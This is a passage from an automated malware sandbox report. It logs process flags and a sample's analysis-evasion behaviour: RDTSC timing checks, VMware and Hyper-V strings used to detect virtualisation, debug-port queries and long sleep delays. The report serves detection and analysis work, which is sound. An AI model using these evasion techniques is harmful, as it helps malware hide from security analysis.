              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Tries to detect virtualization through RDTSC time measurementsShow sources
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeRDTSC instruction interceptor: First address: 0000000000E385F4 second address: 0000000000E385FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeRDTSC instruction interceptor: First address: 0000000000E3898E second address: 0000000000E38994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000005385F4 second address: 00000000005385FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 000000000053898E second address: 0000000000538994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E388C0 rdtsc 18_2_00E388C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3208Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1021Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1915Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2076Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4628Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5676Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5080Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6260Thread sleep count: 1915 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6260Thread sleep count: 2076 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6284Thread sleep count: 40 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7044Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6240Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6232Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
              Source: powershell.exe, 00000008.00000002.361308781.00000000050B4000.00000004.00000001.sdmpBinary or memory string: Hyper-V
              Source: explorer.exe, 00000013.00000000.384363645.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
              Source: explorer.exe, 00000013.00000000.384363645.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
              Source: explorer.exe, 00000013.00000000.384024362.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000013.00000000.383625763.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
              Source: powershell.exe, 00000008.00000002.361308781.00000000050B4000.00000004.00000001.sdmpBinary or memory string: f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
              Source: explorer.exe, 00000013.00000002.501742949.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
              Source: explorer.exe, 00000013.00000000.384363645.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
              Source: explorer.exe, 00000013.00000000.384363645.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
              Source: explorer.exe, 00000013.00000002.501779211.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
              Source: explorer.exe, 00000013.00000000.383625763.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
              Source: explorer.exe, 00000013.00000000.383625763.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
              Source: explorer.exe, 00000013.00000000.383625763.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E388C0 rdtsc 18_2_00E388C0
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E39B30 LdrLoadDll,18_2_00E39B30
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318131B mov eax, dword ptr fs:[00000030h]21_2_0318131B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA309 mov eax, dword ptr fs:[00000030h]21_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03198B58 mov eax, dword ptr fs:[00000030h]21_2_03198B58
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CDB40 mov eax, dword ptr fs:[00000030h]21_2_030CDB40
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CF358 mov eax, dword ptr fs:[00000030h]21_2_030CF358
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CDB60 mov ecx, dword ptr fs:[00000030h]21_2_030CDB60
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F3B7A mov eax, dword ptr fs:[00000030h]21_2_030F3B7A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F3B7A mov eax, dword ptr fs:[00000030h]21_2_030F3B7A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D1B8F mov eax, dword ptr fs:[00000030h]21_2_030D1B8F
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D1B8F mov eax, dword ptr fs:[00000030h]21_2_030D1B8F
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318138A mov eax, dword ptr fs:[00000030h]21_2_0318138A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0317D380 mov ecx, dword ptr fs:[00000030h]21_2_0317D380
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F2397 mov eax, dword ptr fs:[00000030h]21_2_030F2397
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FB390 mov eax, dword ptr fs:[00000030h]21_2_030FB390
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F4BAD mov eax, dword ptr fs:[00000030h]21_2_030F4BAD
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F4BAD mov eax, dword ptr fs:[00000030h]21_2_030F4BAD
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F4BAD mov eax, dword ptr fs:[00000030h]21_2_030F4BAD
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03195BA5 mov eax, dword ptr fs:[00000030h]21_2_03195BA5
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031453CA mov eax, dword ptr fs:[00000030h]21_2_031453CA
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031453CA mov eax, dword ptr fs:[00000030h]21_2_031453CA
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EDBE9 mov eax, dword ptr fs:[00000030h]21_2_030EDBE9
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F03E2 mov eax, dword ptr fs:[00000030h]21_2_030F03E2
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F03E2 mov eax, dword ptr fs:[00000030h]21_2_030F03E2
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F03E2 mov eax, dword ptr fs:[00000030h]21_2_030F03E2
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F03E2 mov eax, dword ptr fs:[00000030h]21_2_030F03E2
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F03E2 mov eax, dword ptr fs:[00000030h]21_2_030F03E2
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F03E2 mov eax, dword ptr fs:[00000030h]21_2_030F03E2
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D8A0A mov eax, dword ptr fs:[00000030h]21_2_030D8A0A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318AA16 mov eax, dword ptr fs:[00000030h]21_2_0318AA16
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318AA16 mov eax, dword ptr fs:[00000030h]21_2_0318AA16
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E3A1C mov eax, dword ptr fs:[00000030h]21_2_030E3A1C
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CAA16 mov eax, dword ptr fs:[00000030h]21_2_030CAA16
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CAA16 mov eax, dword ptr fs:[00000030h]21_2_030CAA16
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C5210 mov eax, dword ptr fs:[00000030h]21_2_030C5210
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C5210 mov ecx, dword ptr fs:[00000030h]21_2_030C5210
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C5210 mov eax, dword ptr fs:[00000030h]21_2_030C5210
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C5210 mov eax, dword ptr fs:[00000030h]21_2_030C5210
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA229 mov eax, dword ptr fs:[00000030h]21_2_030EA229
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA229 mov eax, dword ptr fs:[00000030h]21_2_030EA229
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA229 mov eax, dword ptr fs:[00000030h]21_2_030EA229
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA229 mov eax, dword ptr fs:[00000030h]21_2_030EA229
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA229 mov eax, dword ptr fs:[00000030h]21_2_030EA229
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA229 mov eax, dword ptr fs:[00000030h]21_2_030EA229
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA229 mov eax, dword ptr fs:[00000030h]21_2_030EA229
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA229 mov eax, dword ptr fs:[00000030h]21_2_030EA229
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA229 mov eax, dword ptr fs:[00000030h]21_2_030EA229
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03104A2C mov eax, dword ptr fs:[00000030h]21_2_03104A2C
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03104A2C mov eax, dword ptr fs:[00000030h]21_2_03104A2C
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03154257 mov eax, dword ptr fs:[00000030h]21_2_03154257
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C9240 mov eax, dword ptr fs:[00000030h]21_2_030C9240
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C9240 mov eax, dword ptr fs:[00000030h]21_2_030C9240
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C9240 mov eax, dword ptr fs:[00000030h]21_2_030C9240
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C9240 mov eax, dword ptr fs:[00000030h]21_2_030C9240
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318EA55 mov eax, dword ptr fs:[00000030h]21_2_0318EA55
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0310927A mov eax, dword ptr fs:[00000030h]21_2_0310927A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0317B260 mov eax, dword ptr fs:[00000030h]21_2_0317B260
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0317B260 mov eax, dword ptr fs:[00000030h]21_2_0317B260
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03198A62 mov eax, dword ptr fs:[00000030h]21_2_03198A62
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FD294 mov eax, dword ptr fs:[00000030h]21_2_030FD294
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FD294 mov eax, dword ptr fs:[00000030h]21_2_030FD294
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C52A5 mov eax, dword ptr fs:[00000030h]21_2_030C52A5
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C52A5 mov eax, dword ptr fs:[00000030h]21_2_030C52A5
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C52A5 mov eax, dword ptr fs:[00000030h]21_2_030C52A5
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C52A5 mov eax, dword ptr fs:[00000030h]21_2_030C52A5
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C52A5 mov eax, dword ptr fs:[00000030h]21_2_030C52A5
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030DAAB0 mov eax, dword ptr fs:[00000030h]21_2_030DAAB0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030DAAB0 mov eax, dword ptr fs:[00000030h]21_2_030DAAB0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FFAB0 mov eax, dword ptr fs:[00000030h]21_2_030FFAB0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F2ACB mov eax, dword ptr fs:[00000030h]21_2_030F2ACB
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F2AE4 mov eax, dword ptr fs:[00000030h]21_2_030F2AE4
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C9100 mov eax, dword ptr fs:[00000030h]21_2_030C9100
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C9100 mov eax, dword ptr fs:[00000030h]21_2_030C9100
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C9100 mov eax, dword ptr fs:[00000030h]21_2_030C9100
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E4120 mov eax, dword ptr fs:[00000030h]21_2_030E4120
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E4120 mov eax, dword ptr fs:[00000030h]21_2_030E4120
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E4120 mov eax, dword ptr fs:[00000030h]21_2_030E4120
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E4120 mov eax, dword ptr fs:[00000030h]21_2_030E4120
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E4120 mov ecx, dword ptr fs:[00000030h]21_2_030E4120
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F513A mov eax, dword ptr fs:[00000030h]21_2_030F513A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F513A mov eax, dword ptr fs:[00000030h]21_2_030F513A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EB944 mov eax, dword ptr fs:[00000030h]21_2_030EB944
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EB944 mov eax, dword ptr fs:[00000030h]21_2_030EB944
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CC962 mov eax, dword ptr fs:[00000030h]21_2_030CC962
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CB171 mov eax, dword ptr fs:[00000030h]21_2_030CB171
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CB171 mov eax, dword ptr fs:[00000030h]21_2_030CB171
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FA185 mov eax, dword ptr fs:[00000030h]21_2_030FA185
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EC182 mov eax, dword ptr fs:[00000030h]21_2_030EC182
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F2990 mov eax, dword ptr fs:[00000030h]21_2_030F2990
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031451BE mov eax, dword ptr fs:[00000030h]21_2_031451BE
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031451BE mov eax, dword ptr fs:[00000030h]21_2_031451BE
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031451BE mov eax, dword ptr fs:[00000030h]21_2_031451BE
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031451BE mov eax, dword ptr fs:[00000030h]21_2_031451BE
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F61A0 mov eax, dword ptr fs:[00000030h]21_2_030F61A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F61A0 mov eax, dword ptr fs:[00000030h]21_2_030F61A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E99BF mov ecx, dword ptr fs:[00000030h]21_2_030E99BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E99BF mov ecx, dword ptr fs:[00000030h]21_2_030E99BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E99BF mov eax, dword ptr fs:[00000030h]21_2_030E99BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E99BF mov ecx, dword ptr fs:[00000030h]21_2_030E99BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E99BF mov ecx, dword ptr fs:[00000030h]21_2_030E99BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E99BF mov eax, dword ptr fs:[00000030h]21_2_030E99BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E99BF mov ecx, dword ptr fs:[00000030h]21_2_030E99BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E99BF mov ecx, dword ptr fs:[00000030h]21_2_030E99BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E99BF mov eax, dword ptr fs:[00000030h]21_2_030E99BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E99BF mov ecx, dword ptr fs:[00000030h]21_2_030E99BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E99BF mov ecx, dword ptr fs:[00000030h]21_2_030E99BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E99BF mov eax, dword ptr fs:[00000030h]21_2_030E99BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031469A6 mov eax, dword ptr fs:[00000030h]21_2_031469A6
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031849A4 mov eax, dword ptr fs:[00000030h]21_2_031849A4
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031849A4 mov eax, dword ptr fs:[00000030h]21_2_031849A4
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031849A4 mov eax, dword ptr fs:[00000030h]21_2_031849A4
